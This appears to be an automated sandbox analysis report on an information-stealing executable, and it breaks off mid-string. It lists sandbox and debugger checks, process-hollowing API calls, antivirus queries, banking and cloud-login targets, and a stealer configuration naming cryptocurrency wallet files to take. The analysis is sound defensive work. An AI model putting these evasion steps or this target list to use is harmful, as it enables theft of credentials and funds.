Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_0092CD0C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00935182
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00930F8F GetSystemInfo,wsprintfA, 2_2_00930F8F
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0093D1A8
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00938ADE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_009214AD mov eax, dword ptr fs:[00000030h] 2_2_009214AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092148A mov eax, dword ptr fs:[00000030h] 2_2_0092148A
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_009214A2 mov eax, dword ptr fs:[00000030h] 2_2_009214A2
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00938726 mov eax, dword ptr fs:[00000030h] 2_2_00938726
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00938725 mov eax, dword ptr fs:[00000030h] 2_2_00938725
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_009310EE GetProcessHeap,HeapAlloc,GlobalMemoryStatusEx,wsprintfA, 2_2_009310EE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0093D1A8
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0093DB1C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_009477BE SetUnhandledExceptionFilter, 2_2_009477BE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6CB8AC62

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 2_2_0092F51F
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Memory written: C:\Users\user\Desktop\7ZthFNAqYp.exe base: 920000 value starts with: 4D5A
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_0093247D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00932554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_00932554
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CBD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 2_2_6CBD4760
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 2_2_6CAB1C30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092119E cpuid 2_2_0092119E
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_00930DB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: GetLocaleInfoA, 2_2_0094E834
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0094B25C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 2_2_0094B3F8
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_00949BE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 2_2_0094B351
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 2_2_0094ACD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 2_2_0094B453
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 2_2_00945573
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_00949EFE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 2_2_0094E6FF
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: EnumSystemLocalesA, 2_2_0094B6E6
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 2_2_0094B624
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 2_2_0094762C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 2_2_0094B7B3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0094B710
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 2_2_00947706
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 2_2_00948F54
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0094B777
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 0_2_005E43A3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_005E43A3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00930C28 GetProcessHeap,HeapAlloc,GetUserNameA, 2_2_00930C28
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00930D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 2_2_00930D03
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAD8390 NSS_GetVersion, 2_2_6CAD8390
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia 